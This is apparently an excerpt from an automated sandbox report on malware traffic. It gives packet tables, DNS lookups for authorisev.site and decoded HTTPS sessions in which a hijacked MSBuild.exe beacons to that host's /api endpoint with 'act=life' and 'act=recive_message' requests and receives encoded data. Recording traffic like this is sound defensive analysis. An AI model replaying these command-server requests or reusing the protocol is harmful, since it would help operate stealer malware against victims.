Nov 1, 2024 10:51:12.963896036 CET	49830	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.964174986 CET	49830	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.964185953 CET	443	49830	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.972367048 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.972397089 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.972439051 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.972445965 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.972512960 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.972556114 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.974334955 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.974339008 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.974355936 CET	49827	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.974359989 CET	443	49827	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.978518963 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.978594065 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.979895115 CET	49826	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.980591059 CET	49826	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.980602980 CET	443	49826	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.982167959 CET	49831	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.982184887 CET	443	49831	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.982327938 CET	49831	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.982461929 CET	49831	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.982470989 CET	443	49831	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.983634949 CET	49832	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.983674049 CET	443	49832	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:12.983741999 CET	49832	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.983825922 CET	49832	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:12.983835936 CET	443	49832	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.069444895 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.069874048 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.069909096 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.070436001 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.070442915 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.200464964 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.200481892 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.200536013 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.200551033 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.200592041 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.200634003 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.200762987 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.200779915 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.200792074 CET	49828	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.200798988 CET	443	49828	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.203928947 CET	49833	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.203962088 CET	443	49833	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.204031944 CET	49833	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.204150915 CET	49833	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.204163074 CET	443	49833	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.618817091 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.619252920 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.619273901 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.619685888 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.619690895 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.691838980 CET	443	49830	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.692182064 CET	49830	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.692198038 CET	443	49830	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.692559958 CET	49830	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.692567110 CET	443	49830	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.708890915 CET	443	49832	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.709176064 CET	49832	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.709196091 CET	443	49832	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.709522963 CET	49832	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.709530115 CET	443	49832	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.710819006 CET	443	49831	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.711085081 CET	49831	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.711091995 CET	443	49831	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.711582899 CET	49831	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.711585999 CET	443	49831	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.754029989 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.754055023 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.754131079 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.754137039 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.754146099 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.754185915 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.754363060 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.754371881 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.754393101 CET	49829	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.754396915 CET	443	49829	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:13.756932020 CET	49834	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:13.756958008 CET	443	49834	13.107.246.45	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 10:50:55.462069988 CET	51868	53	192.168.2.4	1.1.1.1
Nov 1, 2024 10:50:55.474848986 CET	53	51868	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 10:50:55.462069988 CET	192.168.2.4	1.1.1.1	0xbd67	Standard query (0)	authorisev.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 10:50:20.456146002 CET	1.1.1.1	192.168.2.4	0xfcb3	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 10:50:20.456146002 CET	1.1.1.1	192.168.2.4	0xfcb3	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 1, 2024 10:50:55.474848986 CET	1.1.1.1	192.168.2.4	0xbd67	No error (0)	authorisev.site		104.21.85.194	A (IP address)	IN (0x0001)	false
Nov 1, 2024 10:50:55.474848986 CET	1.1.1.1	192.168.2.4	0xbd67	No error (0)	authorisev.site		172.67.209.143	A (IP address)	IN (0x0001)	false
Nov 1, 2024 10:50:57.277944088 CET	1.1.1.1	192.168.2.4	0x9131	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 10:50:57.277944088 CET	1.1.1.1	192.168.2.4	0x9131	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

authorisev.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:50:56 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: authorisev.site
2024-11-01 09:50:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-01 09:50:56 UTC	550	IN	HTTP/1.1 403 Forbidden Date: Fri, 01 Nov 2024 09:50:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjjQOQjUQOVK4cOVh2WZh0ToapHd4SyCVl2Tn8KkiQQ96CptCjAlAN7gf5OYvVe4t8qwZbXNwBrVj6rzo5QibK4DyKcXEonuXjIKHOINsGdQT9Ymj2SzkCECE%2F41MpMHtSg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafbc149e26c1c-DFW
2024-11-01 09:50:56 UTC	819	IN	Data Raw: 31 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1154<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-11-01 09:50:56 UTC	1369	IN	Data Raw: 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
2024-11-01 09:50:56 UTC	1369	IN	Data Raw: 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 Data Ascii: nt/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input
2024-11-01 09:50:56 UTC	887	IN	Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
2024-11-01 09:50:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:50:56 UTC	352	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: authorisev.site
2024-11-01 09:50:56 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 6b 66 53 35 66 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=MkfS5f--&j=
2024-11-01 09:50:57 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 09:50:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=njf256ak9tv1qtktsbvuhh92u9; expires=Tue, 25-Feb-2025 03:37:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TArnmlp7puo4LyYBtgh7Uqz5znuvuxLu7sEEA2Ei%2BiOtg11GDIwpyP2%2BOaA%2FV%2FE3iXKinD59zDuMrDXyT7WSJqsyo3VQTYfcYzPrpthPW5gM52sOrWrqHWraInMedai4LBI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafbc648926b89-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1030&delivery_rate=1768009&cwnd=251&unsent_bytes=0&cid=87acf7f9191600e4&ts=466&x=0"
2024-11-01 09:50:57 UTC	357	IN	Data Raw: 34 64 62 0d 0a 2f 59 76 4b 4c 58 76 2b 4a 42 75 73 70 4e 49 74 35 34 48 71 57 78 35 46 2f 2b 62 49 49 4f 41 75 75 46 39 6b 6c 31 36 52 64 35 6d 47 71 62 77 50 51 63 6f 49 4f 64 2f 42 38 42 65 54 38 35 38 2b 4d 6d 65 65 67 75 6f 61 68 6b 2f 55 4c 41 47 37 66 4f 63 61 75 38 66 74 71 30 45 49 6d 77 67 35 79 64 7a 77 46 37 7a 36 79 44 35 77 5a 38 58 45 72 55 71 43 54 39 51 39 42 66 77 78 34 52 76 36 6c 65 65 74 52 52 36 64 51 48 72 41 79 62 64 49 67 75 43 41 4e 58 63 6f 6c 34 76 71 44 4d 4a 4c 77 6e 31 65 74 52 50 30 41 2f 69 77 36 72 6c 47 57 59 4d 49 59 49 37 42 76 41 2f 64 6f 34 73 2b 66 43 6d 5a 67 71 4e 49 69 45 62 63 50 41 44 39 4c 76 67 52 38 5a 58 70 72 6b 51 55 6c 46 52 33 79 73 36 38 54 6f 6a 67 79 48 63 38 49 49 58 45 38 67 4c 52 66 74 6b 73 46 2b Data Ascii: 4db/YvKLXv+JBuspNIt54HqWx5F/+bIIOAuuF9kl16Rd5mGqbwPQcoIOd/B8BeT858+Mmeeguoahk/ULAG7fOcau8ftq0EImwg5ydzwF7z6yD5wZ8XErUqCT9Q9Bfwx4Rv6leetRR6dQHrAybdIguCANXcol4vqDMJLwn1etRP0A/iw6rlGWYMIYI7BvA/do4s+fCmZgqNIiEbcPAD9LvgR8ZXprkQUlFR3ys68TojgyHc8IIXE8gLRftksF+
2024-11-01 09:50:57 UTC	893	IN	Data Raw: 78 73 32 37 53 70 66 6f 67 54 52 78 4a 35 43 4f 70 55 47 43 53 39 41 33 43 66 38 34 2f 68 6a 39 6e 2b 6e 6f 41 56 6d 62 58 6a 6d 57 68 70 4e 4b 6c 65 53 45 4c 7a 34 64 33 5a 76 6b 57 38 4a 4c 31 6e 31 65 74 54 54 32 46 76 69 55 35 71 74 48 45 6f 35 47 61 38 6a 4c 74 56 32 44 35 6f 59 7a 66 7a 57 58 69 71 78 42 69 30 66 54 4f 41 48 78 66 4c 31 56 2f 49 65 70 38 41 38 34 6b 55 31 31 78 4e 47 77 44 35 71 74 6b 58 6c 37 4b 39 33 63 36 6b 61 44 53 4e 73 35 43 50 73 34 2f 78 50 31 6b 75 61 75 52 52 6d 62 54 48 48 47 78 37 31 45 69 75 4f 4e 4e 48 67 68 6b 59 57 76 41 73 77 4d 33 53 56 47 72 58 7a 64 45 76 69 4e 71 35 31 4d 46 35 4a 42 62 34 37 5a 2f 6c 62 46 35 49 52 35 4a 47 65 54 67 61 56 51 67 31 37 66 4d 78 54 35 4f 66 55 59 2b 4a 48 70 72 55 67 55 6b 6b 42 Data Ascii: xs27SpfogTRxJ5COpUGCS9A3Cf84/hj9n+noAVmbXjmWhpNKleSELz4d3ZvkW8JL1n1etTT2FviU5qtHEo5Ga8jLtV2D5oYzfzWXiqxBi0fTOAHxfL1V/Iep8A84kU11xNGwD5qtkXl7K93c6kaDSNs5CPs4/xP1kuauRRmbTHHGx71EiuONNHghkYWvAswM3SVGrXzdEviNq51MF5JBb47Z/lbF5IR5JGeTgaVQg17fMxT5OfUY+JHprUgUkkB
2024-11-01 09:50:57 UTC	1369	IN	Data Raw: 33 66 39 31 0d 0a 64 6b 55 6c 77 78 38 2b 69 52 59 6e 74 6d 6a 52 32 49 70 4f 49 72 30 32 43 54 64 73 7a 44 50 35 38 76 56 58 38 68 36 6e 77 44 7a 61 52 56 6d 76 45 7a 61 45 4e 73 4f 43 47 4e 33 73 78 33 5a 76 6b 57 38 4a 4c 31 6e 31 65 74 54 66 31 47 66 65 66 37 37 70 42 46 6f 35 4d 61 38 72 49 74 45 4f 4c 36 6f 55 32 65 54 57 5a 68 4c 68 44 68 30 76 55 4d 42 54 77 66 4c 31 56 2f 49 65 70 38 41 38 6a 71 45 46 70 33 38 48 79 65 6f 62 74 68 6a 35 71 5a 34 4c 4b 73 77 4b 46 51 4a 70 6c 52 76 59 77 2f 68 7a 2b 6b 50 75 69 51 78 69 4f 51 58 44 48 7a 4c 46 42 69 75 69 45 50 47 34 73 6b 6f 79 6c 51 34 39 42 30 54 6b 47 74 58 4b 7a 45 75 50 66 73 65 68 75 46 4a 4e 55 65 74 2b 45 68 55 79 4c 37 59 38 76 50 44 6a 54 6e 65 70 46 6a 67 79 43 66 51 66 35 4d 50 49 61 Data Ascii: 3f91dkUlwx8+iRYntmjR2IpOIr02CTdszDP58vVX8h6nwDzaRVmvEzaENsOCGN3sx3ZvkW8JL1n1etTf1Gfef77pBFo5Ma8rItEOL6oU2eTWZhLhDh0vUMBTwfL1V/Iep8A8jqEFp38Hyeobthj5qZ4LKswKFQJplRvYw/hz+kPuiQxiOQXDHzLFBiuiEPG4skoylQ49B0TkGtXKzEuPfsehuFJNUet+EhUyL7Y8vPDjTnepFjgyCfQf5MPIa
2024-11-01 09:50:57 UTC	1369	IN	Data Raw: 39 45 45 70 68 43 65 63 50 4e 76 6b 47 4d 37 34 41 31 65 7a 57 51 67 61 4a 49 69 30 6e 57 4d 41 58 6e 50 2f 4a 56 74 64 2f 75 73 41 39 42 33 47 46 4b 2b 65 58 77 55 4d 76 36 79 44 35 77 5a 38 58 45 71 30 71 46 51 74 34 76 43 4f 63 79 39 42 58 39 6c 2b 47 76 51 78 65 53 56 48 48 50 78 72 35 41 6a 65 71 4d 4f 48 67 6a 6b 59 50 71 44 4d 4a 4c 77 6e 31 65 74 52 54 77 44 2b 48 64 78 36 4e 50 48 6f 78 51 59 6f 37 5a 2f 6c 62 46 35 49 52 35 4a 47 65 5a 6a 36 42 4c 67 55 58 65 4d 41 62 38 4d 2f 6f 64 39 70 66 37 71 55 55 4c 6d 45 4e 34 77 63 79 30 52 34 6e 73 68 44 31 75 4c 4e 33 4b 36 6b 57 61 44 49 4a 39 4a 76 34 71 30 41 66 70 33 2f 62 6d 56 6c 6d 62 53 6a 6d 57 68 72 6c 44 68 4f 4b 43 50 33 63 69 6b 49 53 76 53 49 56 41 32 6a 30 46 38 7a 72 2b 48 66 4f 54 35 Data Ascii: 9EEphCecPNvkGM74A1ezWQgaJIi0nWMAXnP/JVtd/usA9B3GFK+eXwUMv6yD5wZ8XEq0qFQt4vCOcy9BX9l+GvQxeSVHHPxr5AjeqMOHgjkYPqDMJLwn1etRTwD+Hdx6NPHoxQYo7Z/lbF5IR5JGeZj6BLgUXeMAb8M/od9pf7qUULmEN4wcy0R4nshD1uLN3K6kWaDIJ9Jv4q0Afp3/bmVlmbSjmWhrlDhOKCP3cikISvSIVA2j0F8zr+HfOT5
2024-11-01 09:50:57 UTC	1369	IN	Data Raw: 5a 54 6e 4c 49 79 4c 46 4a 69 65 37 49 64 7a 77 67 68 63 54 79 41 71 56 57 31 7a 73 52 35 41 6e 30 46 61 72 66 39 75 5a 57 57 5a 74 4b 4f 5a 61 47 76 55 4f 50 37 6f 30 39 64 43 43 65 68 61 5a 47 6a 30 48 65 4e 41 4c 77 4c 75 45 54 39 5a 2f 6d 70 6b 41 56 6a 6b 68 38 7a 73 72 77 41 63 58 6b 6b 48 6b 6b 5a 36 79 54 71 67 4b 64 41 73 4e 39 41 66 6c 38 71 31 58 30 6b 76 75 6b 51 42 6d 64 52 58 33 46 77 62 5a 4a 68 4f 43 4e 4f 6e 6b 68 6e 49 53 6d 53 49 56 45 30 44 4d 4c 38 7a 6a 31 45 37 76 52 71 61 39 58 57 63 51 47 53 38 50 49 75 55 79 44 37 70 34 52 54 57 65 43 79 72 4d 43 68 55 43 61 5a 55 62 78 4e 2f 73 5a 2f 70 66 73 71 55 63 54 6c 45 6c 32 33 4d 65 2f 52 6f 4c 6f 68 54 5a 79 49 70 4f 57 72 55 6d 4a 52 4e 4d 7a 41 4c 56 79 73 78 4c 6a 33 37 48 6f 65 52 Data Ascii: ZTnLIyLFJie7IdzwghcTyAqVW1zsR5An0Farf9uZWWZtKOZaGvUOP7o09dCCehaZGj0HeNALwLuET9Z/mpkAVjkh8zsrwAcXkkHkkZ6yTqgKdAsN9Afl8q1X0kvukQBmdRX3FwbZJhOCNOnkhnISmSIVE0DML8zj1E7vRqa9XWcQGS8PIuUyD7p4RTWeCyrMChUCaZUbxN/sZ/pfsqUcTlEl23Me/RoLohTZyIpOWrUmJRNMzALVysxLj37HoeR
2024-11-01 09:50:57 UTC	1369	IN	Data Raw: 78 73 4b 2b 58 59 54 73 79 48 63 38 49 49 58 45 38 67 4b 7a 57 74 30 36 43 62 63 56 39 41 37 36 6c 65 71 6a 51 31 6d 44 43 47 43 4f 77 62 77 50 33 61 4f 46 4e 58 45 6a 6a 34 69 71 51 6f 74 4c 30 43 38 4a 2b 6a 48 77 46 66 36 4e 36 4c 70 41 45 70 6c 46 66 63 48 4a 76 45 65 50 6f 38 5a 35 65 7a 2f 64 33 4f 70 75 67 56 33 51 66 79 48 76 4b 76 51 5a 36 70 54 6b 70 41 38 47 30 6c 38 35 79 63 72 77 46 38 58 6a 69 54 52 75 49 70 79 4f 6f 45 2b 4b 51 39 38 34 43 66 45 34 2b 42 76 70 6b 65 61 6f 53 52 4b 64 51 33 72 46 7a 4c 35 47 6c 36 50 47 65 58 73 2f 33 64 7a 71 61 4a 6c 4e 31 7a 46 45 32 7a 66 6c 45 72 6d 2b 35 36 4e 49 46 59 6f 47 5a 6f 44 66 38 45 69 4a 6f 39 42 35 64 53 6d 52 68 36 31 4b 69 6b 6e 61 4e 67 62 36 4e 76 30 53 36 5a 58 6c 6f 6c 30 57 6e 30 74 Data Ascii: xsK+XYTsyHc8IIXE8gKzWt06CbcV9A76leqjQ1mDCGCOwbwP3aOFNXEjj4iqQotL0C8J+jHwFf6N6LpAEplFfcHJvEePo8Z5ez/d3OpugV3QfyHvKvQZ6pTkpA8G0l85ycrwF8XjiTRuIpyOoE+KQ984CfE4+BvpkeaoSRKdQ3rFzL5Gl6PGeXs/3dzqaJlN1zFE2zflErm+56NIFYoGZoDf8EiJo9B5dSmRh61KiknaNgb6Nv0S6ZXlol0Wn0t
